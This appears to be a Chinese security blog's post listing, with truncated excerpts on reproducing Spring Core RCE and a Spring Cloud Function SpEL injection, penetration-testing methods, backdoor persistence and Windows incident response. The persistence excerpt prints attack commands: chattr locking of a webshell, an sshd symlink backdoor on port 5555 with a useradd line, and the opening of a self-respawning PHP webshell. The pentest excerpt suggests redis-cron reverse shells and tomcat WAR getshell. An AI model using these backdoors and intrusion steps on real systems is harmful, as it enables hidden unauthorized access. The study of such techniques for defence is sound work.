漏洞复现-Spring core rce排坑小结
仅作为漏洞复现进行学习,切勿对网站进行非法测试,由于漏洞存在较大危害性,截图均进行打码操作
漏洞描述Spring core是Spring系列产品中用来负责发现、创建并处理bean之间的关系的一个工具包,是一个包含Spring框架基本的核心工具包
本次漏洞在Spring框架的JDK9版本(及以上版本)中,远程攻击者可在满足特定条件的基础上,通过框架的参数绑定功能获取AccessLogValve对象并诸如恶意字段值,从而触发pipeline机制并写入任意路径下的文件。
所需条件 1、使用JDK9及以上版本的Spring MVC框架
2、Spring 框架以及衍生的框架spring-beans-*.jar 文件或者存在CachedIntrospectionResults.class
环境搭建1、拉取docker快速搭建
123docker pull vulfocus/spring-core-rce-2022-03-29docker run -d -p 18001:8080 vulfocus/spring-core-rce-2022-03-29sudo service docker resta ...
漏洞复现-Spring Cloud Function SpEL表达式注入
漏洞描述Spring Cloud Function 是基于Spring Boot 的函数计算框架(FaaS),当其启用动态路由functionRouter时, HTTP请求头 spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行
影响版本3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2
漏洞复现编译好的项目 https://github.com/Pizz33/Spring-Cloud-Function-SpEL
使用idea新增一个spring lnitializr项目,选择与环境匹配的java版本
添加spring web和function
右侧栏选择maven-package编译jar包
编译完成后运行jar包
1java -jar demo-0.0.1-SNAPSHOT.jar
访问127.0.0.1:8080出现下图说明搭建成功
发送poc,成功执行命令
1234567POST /functi ...
权限维持-后门隐藏技术
文件上锁123chattr +i webshell.phplsattr webshell.phpchattr -i webshell.php
ssh软链接12ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=5555;useradd test -p test
不死马访问该php文件,会生成一个木马文件用于连接
123456789101112131415161718<?php ignore_user_abort(); set_time_limit(0); $interval = 5; do { $filename = 'test.php'; if(file_exists($filename)) { echo "xxx"; } else { $file = fopen("test.php", "w"); $txt = "<?php phpinfo();?>\ ...
渗透测试-如何高效率挖掘漏洞
前言1、做渗透由始至终,忌讳穿插其他项目进行
2、按顺序细心测试每一个功能点,保证漏洞无遗漏
3、山穷水复疑无路,柳暗花明又一村,一个点利用不到,可以灵活变通尝试其他方向
漏扫工具AWVS
Xray
端口扫描端口扫描可发现系统开放的端口
21、22、3306等远程端口,可使用超级弱口令工具或者railgun自带模块进行暴力破解
6379端口可以尝试redis未授权,使用计划任务等方式弹shell
8080端口可尝试tomcat弱口令部署war包getshell
目录扫描通过目录扫描可以发现系统中存在的脆弱性问题,方便我们进行下一步渗透
对于一些403的页面,可以进行二级目录扫描
dirsearch
Jsfinder
识别系统使用框架可通过指纹工具识别出所使用的框架或者产品
Wappalyzer
tidefinger
CMS二次开发站点通过目录扫描发现带有cms标识残留页面或者通过图标判断出
通过漏洞库查找相关未修复的漏洞
struts2一般使用struts2框架后缀带do或action,可以尝试进行利用
后缀为action,可能使用了struts2框架, ...
应急响应-遭受入侵的通用处置方法
应急响应通用方法查看日志通过cmd输入eventvwr.msc打开事件查看器
在%SystemRoot%\System32\Winevt\Logs\位置存放着日志文件
常见的事件ID安全日志security.evtx
123456784624 -成功登录4625 -失败登录4647 -成功注销4720 -创建⽤户4722 -启⽤账户4724 -重置密码4732 -添加⽤户到组4738 -修改账户
远程登录日志
Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtxMicrosoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx
12345• 1149:⽤户认证成功• 21:远程桌⾯服务:会话登录成功• 22:远程桌⾯服务: 已收到 Shell 启动通知• 24:远程桌⾯服务:会话已断开连接• 25:远程桌⾯服务:会话重新连接成功
连接其他机器日志
Microsoft-Windows-Termina ...







